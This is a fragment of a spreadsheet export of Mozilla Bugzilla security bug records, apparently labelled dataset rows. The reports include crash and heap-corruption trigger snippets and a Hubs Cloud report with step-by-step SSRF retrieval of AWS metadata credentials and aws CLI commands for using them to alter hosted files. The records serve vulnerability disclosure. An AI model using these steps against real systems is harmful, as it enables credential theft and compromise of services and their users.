        <v>6</v>
      </c>
      <c r="W382" t="inlineStr">
        <is>
          <t>As we're building the new infrastructure, it behooves us to populate it with real crash data. This helps us verify that it's functioning, allows us to start building performance metrics history, let's us tune autoscaling and deployment, and a variety of other things.
This bug covers populating -prod-new with crash data.</t>
        </is>
      </c>
      <c r="X382" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="383">
      <c r="A383" t="n">
        <v>635705</v>
      </c>
      <c r="B383" t="inlineStr">
        <is>
          <t>2011-02-21 06:28:11 -0800</t>
        </is>
      </c>
      <c r="C383" t="inlineStr">
        <is>
          <t>Lack of NULL check in OOM allows arbitrary write</t>
        </is>
      </c>
      <c r="D383" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:49 -0700</t>
        </is>
      </c>
      <c r="E383" t="n">
        <v>1</v>
      </c>
      <c r="F383" t="n">
        <v>1</v>
      </c>
      <c r="G383" t="n">
        <v>3</v>
      </c>
      <c r="H383" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I383" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J383" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K383" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L383" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M383" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N383" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P383" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q383" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R383" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S383" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T383" t="n">
        <v>1</v>
      </c>
      <c r="U383" t="n">
        <v>0</v>
      </c>
      <c r="V383" t="n">
        <v>15</v>
      </c>
      <c r="W383" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Build Identifier: 3.6.13
When parsing MIME types (for example the "text/javascript" here: &lt;script type="text/javascript"&gt;...) the following code in netwerk/mime/src/nsMIMEHeaderParamImpl.cpp is called:
function nsMIMEHeaderParamImpl::GetParameterInternal
    158   // aParamName is empty. return the first (possibly) _unnamed_ 'parameter'
    159   // For instance, return 'inline' in the following case:
    160   // Content-Disposition: inline; filename=.....
    161   if (!aParamName || !*aParamName) 
    162     {
    163       for (; *str &amp;&amp; *str != ';' &amp;&amp; !nsCRT::IsAsciiSpace(*str); ++str)
    164         ;
    165       if (str == start)
    166         return NS_ERROR_UNEXPECTED;
    167       *aResult = (char *) nsMemory::Clone(start, (str - start) + 1);
    168       (*aResult)[str - start] = '\0';  // null-terminate
    169       NS_ENSURE_TRUE(*aResult, NS_ERROR_OUT_OF_MEMORY);
    170       return NS_OK;
    171     }
If the Clone call fails (returning NULL), then a null byte is still written to a controlled arbitrary address (0x0 + (str - start)) (where str-start is the length of the MIME type string.)
The address which could be written to does depend on the size of the string which is required to fail the Clone call, but it's still useably arbitrary (and, importantly, is an absolute address :-) ).
Lack of a mapped null page in modern OSes doesn't stop this, since 0x0 is never dereferenced here but a controlled, suitably large offset from it.
One possible exploitation scenario would be using this vuln to overwrite a refcount somewhere, setting it to 0 allowing a use-after-free.
I don't have a PoC unfortunately, I tried to knock up some suitable heap grooming JS but I couldn't get the right layout to trigger the Clone failing. That's not to say it's not possible!
The following html will hit the line of code though:
&lt;html&gt;&lt;head&gt;
&lt;script type="text/javascriptAAAAAAAAAAAA"&gt; &lt;/script&gt;
&lt;/head&gt;&lt;body&gt;x&lt;/body&gt;&lt;/html&gt;
[obviously, you want a MUCH longer run of AAA's :-) ]
Reproducible: Couldn't Reproduce
Steps to Reproduce:
Exhaust memory suitably, document.write() a script tag with a long MIME type</t>
        </is>
      </c>
      <c r="X383" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="384">
      <c r="A384" t="n">
        <v>1713259</v>
      </c>
      <c r="B384" t="inlineStr">
        <is>
          <t>2021-05-27 20:30:50 -0700</t>
        </is>
      </c>
      <c r="C384" t="inlineStr">
        <is>
          <t>Show form reportValidity validationMessage on any website</t>
        </is>
      </c>
      <c r="D384" t="inlineStr">
        <is>
          <t>2024-05-30 10:31:44 -0700</t>
        </is>
      </c>
      <c r="E384" t="n">
        <v>1</v>
      </c>
      <c r="F384" t="n">
        <v>1</v>
      </c>
      <c r="G384" t="n">
        <v>3</v>
      </c>
      <c r="H384" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I384" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J384" t="inlineStr">
        <is>
          <t>UI Widgets</t>
        </is>
      </c>
      <c r="K384" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L384" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M384" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P384" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main90+]</t>
        </is>
      </c>
      <c r="Q384" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R384" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S384" t="inlineStr">
        <is>
          <t>91 Branch</t>
        </is>
      </c>
      <c r="T384" t="n">
        <v>1</v>
      </c>
      <c r="U384" t="n">
        <v>0</v>
      </c>
      <c r="V384" t="n">
        <v>14</v>
      </c>
      <c r="W384" t="inlineStr">
        <is>
          <t>Created attachment 9223917
spoof.bundle.html
After set `reportValidity()` as `canvas.toBlob` callback and set `contenteditable` to `true`, the [reportValidity validationMessage](https://developer.mozilla.org/en-US/docs/Web/API/HTMLSelectElement/setCustomValidity) will persist even the tab was closed. As the [validationMessage](https://developer.mozilla.org/en-US/docs/Web/API/HTMLSelectElement/setCustomValidity) is persist on the screen, after the tab was closed the validationMessage still show to previous active tab.
In this report I demonstrate I able to spoof validationMessage on Twitter then overlap the Twitter button intent (which press enter also works) to retweet/like the tweet. 
As the validationMessage is showed on secure domain, user will likely trust the message is from the website, and the validationMessage will overlap Twitter button intent message so user won't notice that press enter will retweet/like the tweet.
Mozregression show it is regression of [Bug 1684792, open form validation popup anchored at screen coordinate as datetime picker and select do so that it is positioned correctly in out of process iframes](https://bugzilla.mozilla.org/show_bug.cgi?id=1684792)
## Affected version:
- Firefox Nightly 90.0a1 (2021-05-27) (64-bit)
- Firefox Release 88.0.1 (64-bit)
## Unaffected version:
- Firefox 78.10.1esr (64-bit)
## Steps to Reproduce:
1. Visit attached spoof.bundle.html
2. Click "Spoof validationMessage" button
3. Validation message appear on Twitter website
4. If you're logged in then press Enter to like the tweet</t>
        </is>
      </c>
      <c r="X384" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="385">
      <c r="A385" t="n">
        <v>393264</v>
      </c>
      <c r="B385" t="inlineStr">
        <is>
          <t>2007-08-22 12:18:54 -0700</t>
        </is>
      </c>
      <c r="C385" t="inlineStr">
        <is>
          <t>Version/config bumps for Firefox 2.0.0.7 release</t>
        </is>
      </c>
      <c r="D385" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E385" t="n">
        <v>1</v>
      </c>
      <c r="F385" t="n">
        <v>1</v>
      </c>
      <c r="G385" t="n">
        <v>5</v>
      </c>
      <c r="H385" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I385" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J385" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K385" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L385" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M385" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N385" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P385" t="inlineStr"/>
      <c r="Q385" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R385" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S385" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T385" t="n">
        <v>1</v>
      </c>
      <c r="U385" t="n">
        <v>0</v>
      </c>
      <c r="V385" t="n">
        <v>22</v>
      </c>
      <c r="W385" t="inlineStr">
        <is>
          <t>Created attachment 277764
bootstrap config for rc1</t>
        </is>
      </c>
      <c r="X385" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" t="n">
        <v>944353</v>
      </c>
      <c r="B386" t="inlineStr">
        <is>
          <t>2013-11-28 04:12:54 -0800</t>
        </is>
      </c>
      <c r="C386" t="inlineStr">
        <is>
          <t>ABORT: Not allowed to make more decoder calls after error!: '!HasDecoderError()'</t>
        </is>
      </c>
      <c r="D386" t="inlineStr">
        <is>
          <t>2015-02-22 10:10:09 -0800</t>
        </is>
      </c>
      <c r="E386" t="n">
        <v>1</v>
      </c>
      <c r="F386" t="n">
        <v>1</v>
      </c>
      <c r="G386" t="n">
        <v>3</v>
      </c>
      <c r="H386" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I386" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J386" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K386" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L386" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M386" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N386" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P386" t="inlineStr">
        <is>
          <t>found in the wild [adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q386" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R386" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S386" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T386" t="n">
        <v>1</v>
      </c>
      <c r="U386" t="n">
        <v>0</v>
      </c>
      <c r="V386" t="n">
        <v>37</v>
      </c>
      <c r="W386" t="inlineStr">
        <is>
          <t>Created attachment 8339891
windows stack
Found via bughunter on http://www.infovision3.com/
Loading this site result on windows 7 debug trunk build (and according to bughunter also beta/aurora) in
ABORT: Not allowed to make more decoder calls after error!: '!HasDecoderError()'
Will see that i can generate a testcase</t>
        </is>
      </c>
      <c r="X386" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="387">
      <c r="A387" t="n">
        <v>1707898</v>
      </c>
      <c r="B387" t="inlineStr">
        <is>
          <t>2021-04-27 06:30:03 -0700</t>
        </is>
      </c>
      <c r="C387" t="inlineStr">
        <is>
          <t>Mozilla Hubs Cloud: cloud api credentials exposure</t>
        </is>
      </c>
      <c r="D387" t="inlineStr">
        <is>
          <t>2024-05-30 10:30:33 -0700</t>
        </is>
      </c>
      <c r="E387" t="n">
        <v>1</v>
      </c>
      <c r="F387" t="n">
        <v>1</v>
      </c>
      <c r="G387" t="n">
        <v>2</v>
      </c>
      <c r="H387" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I387" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J387" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K387" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L387" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M387" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N387" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P387" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q387" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R387" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S387" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T387" t="n">
        <v>0</v>
      </c>
      <c r="U387" t="n">
        <v>0</v>
      </c>
      <c r="V387" t="n">
        <v>11</v>
      </c>
      <c r="W387" t="inlineStr">
        <is>
          <t>Mozilla Hubs exposes internal cloud endpoints which can be used to get credentials for cloud APIs. 
Tested with current version at 2021-04-27.
Steps to reproduce on AWS:
1. Find out the CORS proxy URL.
Open the start page of a Hubs Cloud installation on AWS.
Find out the assets URL by looking under the Network tab in the browser dev tools.
for example https://HUBS_NAME-assets.HUBS_INTERNAL_DOMAIN/files/...
With this information you can construct the CORS proxy URL.
for example https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/
2. Retrieve the cloud api credentials
Background: AWS offers a special local endpoint for retrieving instance information.
( see https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html )
Open https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/http://169.254.169.254/latest/meta-data/iam/security-credentials/
append a slash and the returned value to the URL and call again.
https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/http://169.254.169.254/latest/meta-data/iam/security-credentials/XXXXXXXX-app
This will return AccessKeyId, SecretAccessKey and Token.
With these anyone can connect to the AWS API and do everything that the server is allowed to do.
3. Perform actions using the servers credentials
For example using the AWS CLI.
Enter the retrieved credentials into .aws/credentials on a machine with AWS CLI installed.
Verify that you have access.
aws --profile testapi --region eu-west-1 sts get-caller-identity
{
    "Account": "XXXXXXXXXX",
    "UserId": "AROAXJVIRVTGPR3HV3X7B:i-XXXXXXXXX",
    "Arn": "arn:aws:sts::XXXXXXXXXX:assumed-role/XXXXXXXX-app/i-XXXXXXXXX"
}
Use the instance ID which the endpoint returned and retrieve the tags. 
aws --profile testapi ec2 describe-tags --filters "Name=resource-id,Values=i-XXXXXXXXX" --region eu-west-1
The S3 bucket name can be constructed using the information from the aws:cloudformation:stack-id tag
Now you can list all assets, retrieve/delete/modify any asset.
aws --profile testapi s3 ls XXXXX-assets-XXXXXX/assets/images/ --region eu-west-1
2021-03-30 11:55:41      11628 hubs-cloud-logo.png
You could also modify the JavaScript files under /hubs/assets/js/ and replace them with versions containing malicious code that will then be delivered to the Hubs users.</t>
        </is>
      </c>
      <c r="X387" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="388">
      <c r="A388" t="n">
        <v>267645</v>
      </c>
      <c r="B388" t="inlineStr">
        <is>
          <t>2004-11-04 02:52:51 -0800</t>
        </is>
      </c>
      <c r="C388" t="inlineStr">
        <is>
          <t>Page can obtain path to Mozilla installation or possibly profile by examining JavaScript exceptions</t>
        </is>
      </c>
      <c r="D388" t="inlineStr">
        <is>
          <t>2022-07-07 11:23:29 -0700</t>
        </is>
      </c>
      <c r="E388" t="n">
        <v>1</v>
      </c>
      <c r="F388" t="n">
        <v>1</v>
      </c>
      <c r="G388" t="n">
        <v>3</v>
      </c>
      <c r="H388" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I388" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J388" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K388" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L388" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M388" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N388" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P388" t="inlineStr">
        <is>
          <t>[sg:want] stepping-stone [fingerprinting][fp-triaged][adv-main75-]</t>
        </is>
      </c>
      <c r="Q388" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R388" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S388" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T388" t="n">
        <v>1</v>
      </c>
      <c r="U388" t="n">
        <v>5</v>
      </c>
      <c r="V388" t="n">
        <v>34</v>
      </c>
      <c r="W388" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ; rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ; rv:1.7.3) Gecko/20040910
I am not sure if this should be considered as security bug. If you don't think
so, open it.
Page which call window.sidebar.addSearchEngine() with bad agruments (bad suffix,
protocol) can catch the exception of the Mozilla code and from it obtain path to
the Mozilla installlation.
Problem is in the nsSidebar.js (in Mozilla and Firefox too) containing line:
this.promptService.alert(null, "Failed to add the search engine.");
there is missing the 3th alert argument (text of the dialog), which raises
expception e.g.:
[Exception... "Not enough arguments [nsIPromptService.alert]"  nsresult:
"0x80570001 (NS_ERROR_XPC_NOT_ENOUGH_ARGS)"  location: "JS frame ::
file:///C:/Program%20Files/mozilla.org/Mozilla/components/nsSidebar.js ::
anonymous :: line 266"  data: no]
HTML page can catch this exception and obtain the path of the problematic file
(i.e. the path of Mozilla installation).
Revealing the path to the nsSidebar.js is not probably critical problem, but
what if the exception raises in some extension in the user profile and the page
can catch path to the user profile (and the user login)?
So problem is propably more general. Should be the HTML page able to catch
exceptions from the Mozilla code? And if should, should it obtain a full text of
the expections (including file path)?
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X388" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="389">
      <c r="A389" t="n">
        <v>736609</v>
      </c>
      <c r="B389" t="inlineStr">
        <is>
          <t>2012-03-16 14:38:40 -0700</t>
        </is>
      </c>
      <c r="C389" t="inlineStr">
        <is>
          <t>Malloc error with ArrayBuffer, Uint32Array and Uint8Array</t>
        </is>
      </c>
      <c r="D389" t="inlineStr">
        <is>
          <t>2013-01-19 14:16:05 -0800</t>
        </is>
      </c>
      <c r="E389" t="n">
        <v>1</v>
      </c>
      <c r="F389" t="n">
        <v>1</v>
      </c>
      <c r="G389" t="n">
        <v>3</v>
      </c>
      <c r="H389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I389" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J389" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K389" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L389" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M389" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N389" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P389" t="inlineStr">
        <is>
          <t>[sg:critical][qa?]</t>
        </is>
      </c>
      <c r="Q389" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R389" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S389" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T389" t="n">
        <v>1</v>
      </c>
      <c r="U389" t="n">
        <v>0</v>
      </c>
      <c r="V389" t="n">
        <v>19</v>
      </c>
      <c r="W389" t="inlineStr">
        <is>
          <t>Created attachment 606742
stack
try {
    a = ArrayBuffer(76);
    b = Uint32Array(a);
    uneval()
    c = Uint8Array(a);
    c.set(b)
} catch (e) {}
crashes js debug and opt shell on m-c changeset c7ef262e3024 with a malloc error:
Tested on 32-bit.
malloc: *** error for object 0xb74ae4: incorrect checksum for freed object - object was probably modified after being freed.
*** set a breakpoint in malloc_error_break to debug
s-s because malloc errors seem scary. A Valgrind log is attached.</t>
        </is>
      </c>
      <c r="X389" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="390">
      <c r="A390" t="n">
        <v>455987</v>
      </c>
      <c r="B390" t="inlineStr">
        <is>
          <t>2008-09-18 19:01:05 -0700</t>
        </is>
      </c>
      <c r="C390" t="inlineStr">
        <is>
          <t>integer overflow in nsEscape</t>
        </is>
      </c>
      <c r="D390" t="inlineStr">
        <is>
          <t>2009-01-28 07:32:57 -0800</t>
        </is>
      </c>
      <c r="E390" t="n">
        <v>1</v>
      </c>
      <c r="F390" t="n">
        <v>1</v>
      </c>
      <c r="G390" t="n">
        <v>3</v>
      </c>
      <c r="H390" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I390" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J390" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K390" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L390" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M390" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N390" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P390" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q390" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R390" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S390" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T390" t="n">
        <v>1</v>
      </c>
      <c r="U390" t="n">
        <v>0</v>
      </c>
      <c r="V390" t="n">
        <v>19</v>
      </c>
      <c r="W390" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #445117 +++
&gt;  /* XXX Hardcoded max entity len. The +1 is for the trailing null. */
&gt;  char *rv = (char *) nsMemory::Alloc(strlen(string) * 6 + 1);
&gt;
&gt; |* 6| overflows at about 683M on 32 bit platform.
The issue Georgi noted in bug 445117 also occurs in xpcom/io/nsEscape.cpp -- the same pattern happens in nsEscapeHTML() and nsEscapeHTML2()
I'm not sure if you can practically stuff 683M into the things that use nsEscapeHTML, maybe if the transport is gzipped.
http://mxr.mozilla.org/mozilla/search?string=nsEscapeHTML</t>
        </is>
      </c>
      <c r="X390" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" t="n">
        <v>1072130</v>
      </c>
      <c r="B391" t="inlineStr">
        <is>
          <t>2014-09-23 23:37:06 -0700</t>
        </is>
      </c>
      <c r="C391" t="inlineStr">
        <is>
          <t>Use-after-poison [@ mozilla::FontFamilyList::FontFamilyList] with unicode-bidi: bidi-override</t>
        </is>
      </c>
      <c r="D391" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:48 -0700</t>
        </is>
      </c>
      <c r="E391" t="n">
        <v>1</v>
      </c>
      <c r="F391" t="n">
        <v>1</v>
      </c>
      <c r="G391" t="n">
        <v>3</v>
      </c>
      <c r="H391" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I391" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J391" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K391" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L391" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M391" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N391" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P391" t="inlineStr">
        <is>
          <t>[adv-main35+]</t>
        </is>
      </c>
      <c r="Q391" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R391" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S391" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T391" t="n">
        <v>1</v>
      </c>
      <c r="U391" t="n">
        <v>0</v>
      </c>
      <c r="V391" t="n">
        <v>10</v>
      </c>
      <c r="W391" t="inlineStr">
        <is>
          <t>Created attachment 8494288
testcase (crashes Firefox)</t>
        </is>
      </c>
      <c r="X391" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" t="n">
        <v>533000</v>
      </c>
      <c r="B392" t="inlineStr">
        <is>
          <t>2009-12-04 14:08:36 -0800</t>
        </is>
      </c>
      <c r="C392" t="inlineStr">
        <is>
          <t>Web Worker Array Handling Heap Corruption Vulnerability (ZDI-CAN-624)</t>
        </is>
      </c>
      <c r="D392" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E392" t="n">
        <v>1</v>
      </c>
      <c r="F392" t="n">
        <v>1</v>
      </c>
      <c r="G392" t="n">
        <v>3</v>
      </c>
      <c r="H392" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I392" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J392" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K392" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L392" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M392" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N392" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P392" t="inlineStr">
        <is>
          <t>[sg:critical?] See comment 18, remaining OOM DoS moved to bug 542742</t>
        </is>
      </c>
      <c r="Q392" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R392" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S392" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T392" t="n">
        <v>1</v>
      </c>
      <c r="U392" t="n">
        <v>0</v>
      </c>
      <c r="V392" t="n">
        <v>26</v>
      </c>
      <c r="W392" t="inlineStr">
        <is>
          <t>Received this from ZDI today, from the same guy who found bug 514554:
ZDI-CAN-624: Mozilla Firefox Web Worker Array Handling Heap Corruption Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefox 3.5.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists within the implementation of web worker
threads. Due to mishandling the array data type while processing posted
messages, a web worker thread can be made to corrupt heap memory. An
attacker can exploit this vulnerability to execute arbitrary code under
the context of the user running the browser.
Version(s)  tested: Firefox 3.5
Platform(s) tested: Vista 32, 64
The faulty code resides within the handling of postMessage method calls.
Specifically, the passing of an array argument to a postMessage call as
follows:
var sprayContainer = new Array();
var worker = new Worker("crash.js");
for (i=0; i&lt;600; i++)  
{
    worker.postMessage(sprayContainer[i]);
}
--------------------------------------------
where crash.js contains:
--------------------------------------------
onmessage = function(event){
var worker = new Worker("workCRASH1.js");
	worker.onmessage = function(event)
	{	
		worker.postMessage(event.data);
		postMessage(event.data);
	};
worker.postMessage(event.data);
postMessage(event.data);
}
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * Orlando Barrera II, SecTheory</t>
        </is>
      </c>
      <c r="X392" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" t="n">
        <v>1356607</v>
      </c>
      <c r="B393" t="inlineStr">
        <is>
          <t>2017-04-14 10:33:32 -0700</t>
        </is>
      </c>
      <c r="C393" t="inlineStr">
        <is>
          <t>Graphite2: heap-buffer-overflow read [@ graphite2::Silf::getClassGlyph]</t>
        </is>
      </c>
      <c r="D393" t="inlineStr">
        <is>
          <t>2017-10-26 19:20:22 -0700</t>
        </is>
      </c>
      <c r="E393" t="n">
        <v>1</v>
      </c>
      <c r="F393" t="n">
        <v>1</v>
      </c>
      <c r="G393" t="n">
        <v>3</v>
      </c>
      <c r="H393" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I393" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J393" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
